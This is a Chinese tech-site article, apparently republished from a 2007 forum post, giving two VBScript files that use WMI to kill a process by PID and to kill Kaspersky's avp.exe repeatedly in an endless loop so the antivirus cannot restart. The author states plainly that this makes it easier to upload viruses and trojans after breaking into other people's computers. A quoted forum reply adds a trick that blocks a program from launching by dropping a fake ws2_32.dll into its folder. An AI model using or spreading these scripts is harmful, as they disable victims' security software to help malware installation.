温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

怎么用VBS实现脚本结束进程与防止进程启动

发布时间:2021-09-30 10:16:16 来源:亿速云 阅读:278 作者:小新 栏目:开发技术

这篇文章将为大家详细讲解有关怎么用VBS实现脚本结束进程与防止进程启动,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。


Kill.vbs:

代码如下:


for each ps in getobject _  
("winmgmts:\\.\root\cimv2:win32_process").instances_ '涉及到WMI脚本入侵技术,我不能解释清楚! 
if ps.handle=wscript.arguments(0) then  '判断进程的PID号是否与获得的PID号参数相等 
wscript.echo ps.terminate '如果相等就结束指定PID号对应的进程 
end if 
next 


Dis.vbs

代码如下:


dim y,x '不要这行也行…… 
do '来个死循环……一直在判断!do ... loop内为循环体! 
set y=getobject("winmgmts:\\.\root\cimv2") '和上面解释一样,这也是涉及到微软的WMI技术! 
set x=y.execquery("select * from win32_process where name='avp.exe'")  
'查询语句,where后判断avp.exe(卡巴)是否存在进程中! 
'这样当卡巴被上面的Kill.vbs结束时就再也启动不起来了。除非,把Dis.vbs结束了先…… 
for each i in x  
i.terminate()  '卡巴要启动马上就终止…… 
next  
wscript.sleep 
loop 

解释够清楚了,那就来看看这两个vbs是如何工作的吧。我将Kill.vbs与Dis.vbs放在C盘根目录下。
打开cmd,输入cd\回到C盘根目录下,输入tasklist查看当前系统的进程情况,然后记下你想kill的进程的PID号,输入cscript Kill.vbs 2200即可结束PID为2200的进程了!假如这个进程是avp.exe,那你就可以输入Dis.vbs启动Dis.vbs来防止卡巴继续被启动。Dis.vbs启动时仅在任务管理器的进程中有wscript.exe进程项,要是不结束这个进程是无法再次启动卡巴的。
懂得这些,为以后入侵他人电脑后上传病毒、木马之类的就更方便了一点点……上面的所有过程都经本人试验成功了,继续完善……

代码如下:


ws2_32.dll 
在程序目录里建立这个也能组织程序运行 
 Greysign - 2007-03-20 19:01 阻止. 
 ycosxhack - 2007-03-20 19:15 
我晕了,果然啊!建立个记事本改名为ws2_32.dll,就……好,记下啦!呵呵……  
 Greysign - 2007-03-20 21:21 
运行程序会在WINDOWS目录寻找这个接口文件.但是会先在程序目录先搜索一遍  
 ycosxhack - 2007-03-20 21:43  
接口文件?你的意思是:任何程序都必须寻找它了?调用这个库文件吧?删了它就真正麻烦了…… 
 Greysign - 2007-03-20 22:37 嗯.

关于“怎么用VBS实现脚本结束进程与防止进程启动”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

vbs
AI